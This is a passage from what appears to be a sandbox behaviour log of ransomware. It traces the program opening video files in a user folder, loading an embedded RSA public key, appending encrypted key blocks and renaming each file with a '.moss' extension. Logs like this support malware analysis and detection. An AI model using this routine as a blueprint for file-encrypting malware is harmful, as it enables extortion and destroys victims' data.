lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15145, lpOverlapped=0x0) returned 1 [0172.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.886] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.887] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.887] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.887] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.887] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.887] GetLastError () returned 0x0 [0172.887] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.887] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.887] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.887] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.887] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.893] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.894] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15145, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.894] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.894] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.894] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\g6YWZzTvblVcc17ujwd.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\g6ywzztvblvcc17ujwd.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\g6YWZzTvblVcc17ujwd.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\g6ywzztvblvcc17ujwd.flv.moss")) returned 1 [0172.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.895] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.897] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba3f6fb0, ftCreationTime.dwHighDateTime=0x1d5e7a4, ftLastAccessTime.dwLowDateTime=0xa40280c0, ftLastAccessTime.dwHighDateTime=0x1d5e713, ftLastWriteTime.dwLowDateTime=0xa40280c0, ftLastWriteTime.dwHighDateTime=0x1d5e713, nFileSizeHigh=0x0, nFileSizeLow=0x7a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KUZUPCBgZU.mkv", cAlternateFileName="KUZUPC~1.MKV")) returned 1 [0172.897] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\KUZUPCBgZU.mkv") returned=".mkv" [0172.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\KUZUPCBgZU.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\kuzupcbgzu.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.897] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1953) returned 1 [0172.897] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.901] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x77b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.901] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.902] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7a1, lpOverlapped=0x0) returned 1 [0172.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.902] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.903] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.903] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.903] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.904] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.904] GetLastError () returned 0x0 [0172.904] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.904] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.904] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.904] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.904] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.904] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.904] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.905] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.905] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\KUZUPCBgZU.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\kuzupcbgzu.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\KUZUPCBgZU.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\kuzupcbgzu.mkv.moss")) returned 1 [0172.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.906] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.907] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a647f0, ftCreationTime.dwHighDateTime=0x1d5dac1, ftLastAccessTime.dwLowDateTime=0xd1c29850, ftLastAccessTime.dwHighDateTime=0x1d5e2a5, ftLastWriteTime.dwLowDateTime=0xd1c29850, ftLastWriteTime.dwHighDateTime=0x1d5e2a5, nFileSizeHigh=0x0, nFileSizeLow=0x137ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lygnvoy4wgLu9xt.swf", cAlternateFileName="LYGNVO~1.SWF")) returned 1 [0172.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\lygnvoy4wgLu9xt.swf") returned=".swf" [0172.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\lygnvoy4wgLu9xt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\lygnvoy4wglu9xt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.908] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=79871) returned 1 [0172.908] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.911] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x137d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.911] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.913] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x137ff, lpOverlapped=0x0) returned 1 [0172.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.914] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.915] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.915] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.915] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.915] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.915] GetLastError () returned 0x0 [0172.915] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.915] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.915] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.916] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.916] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.916] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.916] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.917] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x137ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.917] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.917] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.917] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\lygnvoy4wgLu9xt.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\lygnvoy4wglu9xt.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\lygnvoy4wgLu9xt.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\lygnvoy4wglu9xt.swf.moss")) returned 1 [0172.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.918] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.920] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14cb2610, ftCreationTime.dwHighDateTime=0x1d5d80d, ftLastAccessTime.dwLowDateTime=0x3ff04430, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x3ff04430, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oP1lxXXorEhMU", cAlternateFileName="OP1LXX~1")) returned 1 [0172.920] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\Tgxvq60OcA3VT.mp4") returned=".mp4" [0172.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\Tgxvq60OcA3VT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\tgxvq60oca3vt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.920] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=101288) returned 1 [0172.920] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.923] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18b82, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.923] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.924] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x18ba8, lpOverlapped=0x0) returned 1 [0172.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.924] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2efa8) returned 1 [0172.925] CryptCreateHash (in: hProv=0xd2efa8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.925] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.926] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.926] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.926] GetLastError () returned 0x0 [0172.926] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.926] CryptReleaseContext (hProv=0xd2efa8, dwFlags=0x0) returned 1 [0172.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.926] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.926] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.926] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.927] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.927] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18ba8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.927] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.928] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\Tgxvq60OcA3VT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\tgxvq60oca3vt.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\Tgxvq60OcA3VT.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\tgxvq60oca3vt.mp4.moss")) returned 1 [0172.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.928] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.930] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de25580, ftCreationTime.dwHighDateTime=0x1d5dca6, ftLastAccessTime.dwLowDateTime=0xb836c720, ftLastAccessTime.dwHighDateTime=0x1d5e6e3, ftLastWriteTime.dwLowDateTime=0xb836c720, ftLastWriteTime.dwHighDateTime=0x1d5e6e3, nFileSizeHigh=0x0, nFileSizeLow=0x18ba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tgxvq60OcA3VT.mp4", cAlternateFileName="TGXVQ6~1.MP4")) returned 0 [0172.930] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0172.930] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2eae0 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35b7de8 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd59b28 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35d9278 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f1c8 | out: hHeap=0xcd0000) returned 1 [0172.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609fa8 | out: hHeap=0xcd0000) returned 1 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0172.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b42628 | out: hHeap=0xcd0000) returned 1 [0172.931] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.931] PathFindFileNameW 